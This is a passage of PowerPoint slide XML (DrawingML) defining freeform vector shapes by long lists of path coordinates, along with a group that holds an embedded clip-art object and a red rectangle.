                  <a:gd name="T4" fmla="*/ 0 w 16"/>
                  <a:gd name="T5" fmla="*/ 0 h 30"/>
                  <a:gd name="T6" fmla="*/ 0 w 16"/>
                  <a:gd name="T7" fmla="*/ 0 h 30"/>
                  <a:gd name="T8" fmla="*/ 0 w 16"/>
                  <a:gd name="T9" fmla="*/ 0 h 30"/>
                  <a:gd name="T10" fmla="*/ 0 w 16"/>
                  <a:gd name="T11" fmla="*/ 0 h 30"/>
                  <a:gd name="T12" fmla="*/ 0 w 16"/>
                  <a:gd name="T13" fmla="*/ 0 h 30"/>
                  <a:gd name="T14" fmla="*/ 0 w 16"/>
                  <a:gd name="T15" fmla="*/ 0 h 30"/>
                  <a:gd name="T16" fmla="*/ 0 w 16"/>
                  <a:gd name="T17" fmla="*/ 0 h 30"/>
                  <a:gd name="T18" fmla="*/ 0 w 16"/>
                  <a:gd name="T19" fmla="*/ 0 h 30"/>
                  <a:gd name="T20" fmla="*/ 0 w 16"/>
                  <a:gd name="T21" fmla="*/ 0 h 30"/>
                  <a:gd name="T22" fmla="*/ 0 w 16"/>
                  <a:gd name="T23" fmla="*/ 0 h 30"/>
                  <a:gd name="T24" fmla="*/ 0 w 16"/>
                  <a:gd name="T25" fmla="*/ 0 h 30"/>
                  <a:gd name="T26" fmla="*/ 0 w 16"/>
                  <a:gd name="T27" fmla="*/ 0 h 30"/>
                  <a:gd name="T28" fmla="*/ 0 w 16"/>
                  <a:gd name="T29" fmla="*/ 0 h 30"/>
                  <a:gd name="T30" fmla="*/ 0 w 16"/>
                  <a:gd name="T31" fmla="*/ 0 h 30"/>
                  <a:gd name="T32" fmla="*/ 0 w 16"/>
                  <a:gd name="T33" fmla="*/ 0 h 30"/>
                  <a:gd name="T34" fmla="*/ 0 w 16"/>
                  <a:gd name="T35" fmla="*/ 0 h 30"/>
                  <a:gd name="T36" fmla="*/ 0 w 16"/>
                  <a:gd name="T37" fmla="*/ 0 h 30"/>
                  <a:gd name="T38" fmla="*/ 0 w 16"/>
                  <a:gd name="T39" fmla="*/ 0 h 30"/>
                  <a:gd name="T40" fmla="*/ 0 w 16"/>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
                  <a:gd name="T64" fmla="*/ 0 h 30"/>
                  <a:gd name="T65" fmla="*/ 16 w 16"/>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 h="30">
                    <a:moveTo>
                      <a:pt x="7" y="30"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="5" y="24"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1" y="15"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="7"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="5" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="9" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="14" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="15" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="14" y="7"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="11" y="12"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="10" y="16"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="10" y="18"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="11" y="21"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="15" y="24"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="16" y="27"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="15" y="28"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="11" y="29"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="9" y="30"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="8" y="30"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="7" y="3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grpSp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="2081" name="Group 86"/>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="990600" y="4724400"/>
            <a:ext cx="892175" cy="1309688"/>
            <a:chOff x="228" y="851"/>
            <a:chExt cx="334" cy="490"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:graphicFrame>
          <p:nvGraphicFramePr>
            <p:cNvPr id="2056" name="Object 20"/>
            <p:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </p:cNvGraphicFramePr>
            <p:nvPr/>
          </p:nvGraphicFramePr>
          <p:xfrm>
            <a:off x="228" y="1003"/>
            <a:ext cx="324" cy="338"/>
          </p:xfrm>
          <a:graphic>
            <a:graphicData uri="http://schemas.openxmlformats.org/presentationml/2006/ole">
              <mc:AlternateContent xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006">
                <mc:Choice xmlns:v="urn:schemas-microsoft-com:vml" Requires="v">
                  <p:oleObj spid="_x0000_s265831" name="Clip" r:id="rId12" imgW="2501798" imgH="2616098" progId="">
                    <p:embed/>
                  </p:oleObj>
                </mc:Choice>
                <mc:Fallback>
                  <p:oleObj name="Clip" r:id="rId12" imgW="2501798" imgH="2616098" progId="">
                    <p:embed/>
                    <p:pic>
                      <p:nvPicPr>
                        <p:cNvPr id="0" name="Picture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 y="1003"/>
                          <a:ext cx="324" cy="338"/>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082" name="Rectangle 88"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="327" y="1041"/>
              <a:ext cx="121" cy="91"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="FF0043"/>
            </a:solidFill>
            <a:ln w="12700">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:miter lim="800000"/>
              <a:headEnd type="none" w="sm" len="sm"/>
              <a:tailEnd type="none" w="sm" len="sm"/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" anchor="ctr"/>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="ctr">
                <a:lnSpc>
                  <a:spcPct val="95000"/>
                </a:lnSpc>
                <a:spcBef>
                  <a:spcPct val="30000"/>
                </a:spcBef>
              </a:pPr>
              <a:endParaRPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0043"/>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="2083" name="Group 89"/>
            <p:cNvGrpSpPr>
              <a:grpSpLocks/>
            </p:cNvGrpSpPr>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr bwMode="auto">
            <a:xfrm>
              <a:off x="228" y="851"/>
              <a:ext cx="334" cy="214"/>
              <a:chOff x="288" y="2254"/>
              <a:chExt cx="528" cy="338"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="2084" name="Freeform 90"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="288" y="2254"/>
                <a:ext cx="528" cy="338"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 1616"/>
                  <a:gd name="T1" fmla="*/ 0 h 1034"/>
                  <a:gd name="T2" fmla="*/ 0 w 1616"/>
                  <a:gd name="T3" fmla="*/ 0 h 1034"/>
                  <a:gd name="T4" fmla="*/ 0 w 1616"/>
                  <a:gd name="T5" fmla="*/ 0 h 1034"/>
                  <a:gd name="T6" fmla="*/ 0 w 1616"/>
                  <a:gd name="T7" fmla="*/ 0 h 1034"/>
                  <a:gd name="T8" fmla="*/ 0 w 1616"/>
                  <a:gd name="T9" fmla="*/ 0 h 1034"/>
                  <a:gd name="T10" fmla="*/ 0 w 1616"/>
                  <a:gd name="T11" fmla="*/ 0 h 1034"/>
                  <a:gd name="T12" fmla="*/ 0 w 1616"/>
                  <a:gd name="T13" fmla="*/ 0 h 1034"/>
                  <a:gd name="T14" fmla="*/ 0 w 1616"/>
                  <a:gd name="T15" fmla="*/ 0 h 1034"/>
                  <a:gd name="T16" fmla="*/ 0 w 1616"/>
                  <a:gd name="T17" fmla="*/ 0 h 1034"/>
                  <a:gd name="T18" fmla="*/ 0 w 1616"/>
                  <a:gd name="T19" fmla="*/ 0 h 1034"/>
                  <a:gd name="T20" fmla="*/ 0 w 1616"/>
                  <a:gd name="T21" fmla="*/ 0 h 1034"/>
                  <a:gd name="T22" fmla="*/ 0 w 1616"/>
                  <a:gd name="T23" fmla="*/ 0 h 1034"/>
                  <a:gd name="T24" fmla="*/ 0 w 1616"/>
                  <a:gd name="T25" fmla="*/ 0 h 1034"/>
                  <a:gd name="T26" fmla="*/ 0 w 1616"/>
                  <a:gd name="T27" fmla="*/ 0 h 1034"/>
                  <a:gd name="T28" fmla="*/ 0 w 1616"/>
                  <a:gd name="T29" fmla="*/ 0 h 1034"/>
                  <a:gd name="T30" fmla="*/ 0 w 1616"/>
                  <a:gd name="T31" fmla="*/ 0 h 1034"/>
                  <a:gd name="T32" fmla="*/ 0 w 1616"/>
                  <a:gd name="T33" fmla="*/ 0 h 1034"/>
                  <a:gd name="T34" fmla="*/ 0 w 1616"/>
                  <a:gd name="T35" fmla="*/ 0 h 1034"/>
                  <a:gd name="T36" fmla="*/ 0 w 1616"/>
                  <a:gd name="T37" fmla="*/ 0 h 1034"/>
                  <a:gd name="T38" fmla="*/ 0 w 1616"/>
                  <a:gd name="T39" fmla="*/ 0 h 1034"/>
                  <a:gd name="T40" fmla="*/ 0 w 1616"/>
                  <a:gd name="T41" fmla="*/ 0 h 1034"/>
                  <a:gd name="T42" fmla="*/ 0 w 1616"/>
                  <a:gd name="T43" fmla="*/ 0 h 1034"/>
                  <a:gd name="T44" fmla="*/ 0 w 1616"/>
                  <a:gd name="T45" fmla="*/ 0 h 1034"/>
                  <a:gd name="T46" fmla="*/ 0 w 1616"/>
                  <a:gd name="T47" fmla="*/ 0 h 1034"/>
                  <a:gd name="T48" fmla="*/ 0 w 1616"/>
                  <a:gd name="T49" fmla="*/ 0 h 1034"/>
                  <a:gd name="T50" fmla="*/ 0 w 1616"/>
                  <a:gd name="T51" fmla="*/ 0 h 1034"/>
                  <a:gd name="T52" fmla="*/ 0 w 1616"/>
                  <a:gd name="T53" fmla="*/ 0 h 1034"/>
                  <a:gd name="T54" fmla="*/ 0 w 1616"/>
                  <a:gd name="T55" fmla="*/ 0 h 1034"/>
                  <a:gd name="T56" fmla="*/ 0 w 1616"/>
                  <a:gd name="T57" fmla="*/ 0 h 1034"/>
                  <a:gd name="T58" fmla="*/ 0 w 1616"/>
                  <a:gd name="T59" fmla="*/ 0 h 1034"/>
                  <a:gd name="T60" fmla="*/ 0 w 1616"/>
                  <a:gd name="T61" fmla="*/ 0 h 1034"/>
                  <a:gd name="T62" fmla="*/ 0 w 1616"/>
                  <a:gd name="T63" fmla="*/ 0 h 1034"/>
                  <a:gd name="T64" fmla="*/ 0 w 1616"/>
                  <a:gd name="T65" fmla="*/ 0 h 1034"/>
                  <a:gd name="T66" fmla="*/ 0 w 1616"/>
                  <a:gd name="T67" fmla="*/ 0 h 1034"/>
                  <a:gd name="T68" fmla="*/ 0 w 1616"/>
                  <a:gd name="T69" fmla="*/ 0 h 1034"/>
                  <a:gd name="T70" fmla="*/ 0 w 1616"/>
                  <a:gd name="T71" fmla="*/ 0 h 1034"/>
                  <a:gd name="T72" fmla="*/ 0 w 1616"/>
                  <a:gd name="T73" fmla="*/ 0 h 1034"/>
                  <a:gd name="T74" fmla="*/ 0 w 1616"/>
                  <a:gd name="T75" fmla="*/ 0 h 1034"/>
                  <a:gd name="T76" fmla="*/ 0 w 1616"/>
                  <a:gd name="T77" fmla="*/ 0 h 1034"/>
                  <a:gd name="T78" fmla="*/ 0 w 1616"/>
                  <a:gd name="T79" fmla="*/ 0 h 1034"/>
                  <a:gd name="T80" fmla="*/ 0 w 1616"/>
                  <a:gd name="T81" fmla="*/ 0 h 1034"/>
                  <a:gd name="T82" fmla="*/ 0 w 1616"/>
                  <a:gd name="T83" fmla="*/ 0 h 1034"/>
                  <a:gd name="T84" fmla="*/ 0 w 1616"/>
                  <a:gd name="T85" fmla="*/ 0 h 1034"/>
                  <a:gd name="T86" fmla="*/ 0 w 1616"/>
                  <a:gd name="T87" fmla="*/ 0 h 1034"/>
                  <a:gd name="T88" fmla="*/ 0 w 1616"/>
                  <a:gd name="T89" fmla="*/ 0 h 1034"/>
                  <a:gd name="T90" fmla="*/ 0 w 1616"/>
                  <a:gd name="T91" fmla="*/ 0 h 1034"/>
                  <a:gd name="T92" fmla="*/ 0 w 1616"/>
                  <a:gd name="T93" fmla="*/ 0 h 1034"/>
                  <a:gd name="T94" fmla="*/ 0 w 1616"/>
                  <a:gd name="T95" fmla="*/ 0 h 1034"/>
                  <a:gd name="T96" fmla="*/ 0 w 1616"/>
                  <a:gd name="T97" fmla="*/ 0 h 1034"/>
                  <a:gd name="T98" fmla="*/ 0 w 1616"/>
                  <a:gd name="T99" fmla="*/ 0 h 1034"/>
                  <a:gd name="T100" fmla="*/ 0 w 1616"/>
                  <a:gd name="T101" fmla="*/ 0 h 1034"/>
                  <a:gd name="T102" fmla="*/ 0 w 1616"/>
                  <a:gd name="T103" fmla="*/ 0 h 1034"/>
                  <a:gd name="T104" fmla="*/ 0 w 1616"/>
                  <a:gd name="T105" fmla="*/ 0 h 1034"/>
                  <a:gd name="T106" fmla="*/ 0 w 1616"/>
                  <a:gd name="T107" fmla="*/ 0 h 1034"/>
                  <a:gd name="T108" fmla="*/ 0 w 1616"/>
                  <a:gd name="T109" fmla="*/ 0 h 10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16"/>
                  <a:gd name="T166" fmla="*/ 0 h 1034"/>
                  <a:gd name="T167" fmla="*/ 1616 w 1616"/>
                  <a:gd name="T168" fmla="*/ 1034 h 10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16" h="1034">
                    <a:moveTo>
                      <a:pt x="499" y="13"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="504" y="13"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="512" y="13"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="522" y="14"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="532" y="14"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="541" y="14"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="549" y="15"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="556" y="15"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="561" y="15"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="565" y="15"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="572" y="14"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="580" y="12"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="591" y="9"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="600" y="8"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="608" y="6"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="614" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="616" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="618" y="6"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="624" y="7"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="631" y="9"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="639" y="12"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="647" y="14"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="655" y="16"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="661" y="17"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="666" y="18"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="670" y="18"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="677" y="20"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="686" y="20"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="696" y="20"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="706" y="21"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="715" y="22"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="723" y="23"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="729" y="25"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="736" y="28"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="746" y="31"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="760" y="36"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="775" y="40"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="790" y="45"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="805" y="49"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="815" y="52"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="823" y="53"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="833" y="47"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="842" y="40"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="850" y="35"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="856" y="32"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="859" y="31"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="865" y="28"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="874" y="23"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="882" y="18"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="891" y="14"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="899" y="9"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="905" y="7"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="909" y="6"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="914" y="6"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="925" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="935" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="948" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="959" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="970" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="978" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="982" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="989" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1001" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1013" y="8"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1027" y="13"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1041" y="17"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1053" y="22"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1059" y="24"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1063" y="26"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1069" y="32"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1078" y="43"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1088" y="56"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1099" y="71"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1108" y="86"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1117" y="100"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1123" y="110"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1125" y="115"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1132" y="125"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1148" y="148"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1171" y="181"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1197" y="217"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1223" y="254"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1246" y="288"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1264" y="313"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1273" y="325"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1281" y="328"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1292" y="329"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1308" y="329"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1324" y="329"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1339" y="329"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1353" y="329"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1363" y="329"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1369" y="329"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1374" y="331"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1383" y="335"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1397" y="339"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1412" y="345"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1427" y="351"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1441" y="357"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1451" y="361"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1458" y="365"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1468" y="375"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1488" y="399"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1513" y="432"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1542" y="470"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1570" y="508"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1593" y="542"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1609" y="566"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1615" y="576"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1615" y="595"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1615" y="629"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1616" y="664"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1615" y="683"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1612" y="691"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1606" y="709"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1598" y="730"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1589" y="756"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1580" y="781"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1571" y="803"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1564" y="820"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1559" y="829"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1555" y="835"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1547" y="842"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1536" y="851"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1525" y="859"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1512" y="867"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1501" y="874"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1489" y="880"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1479" y="882"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1468" y="883"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1449" y="883"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1423" y="884"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1395" y="886"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1367" y="887"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1342" y="887"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1322" y="887"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1311" y="887"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1304" y="886"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1294" y="883"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1284" y="882"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1274" y="880"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1262" y="878"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1253" y="875"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1245" y="874"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1240" y="874"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1220" y="881"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1194" y="888"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1168" y="897"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1141" y="904"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1117" y="912"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1095" y="918"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1079" y="922"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1071" y="925"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1068" y="925"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1059" y="926"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1050" y="926"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1038" y="926"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1023" y="926"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1008" y="926"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="990" y="926"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="974" y="925"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="957" y="925"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="940" y="925"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="925" y="924"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="911" y="924"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="898" y="924"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="888" y="924"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="881" y="924"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="878" y="924"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="871" y="926"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="861" y="930"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="849" y="937"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="833" y="944"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="816" y="953"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="797" y="963"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="778" y="972"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="758" y="982"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="738" y="993"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="720" y="1002"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="701" y="1010"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="685" y="1018"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="671" y="1025"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="661" y="1029"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="653" y="1033"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="648" y="1034"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="638" y="1033"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="617" y="1032"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="588" y="1028"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="557" y="1024"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="525" y="1019"/>
                    </a:lnTo>
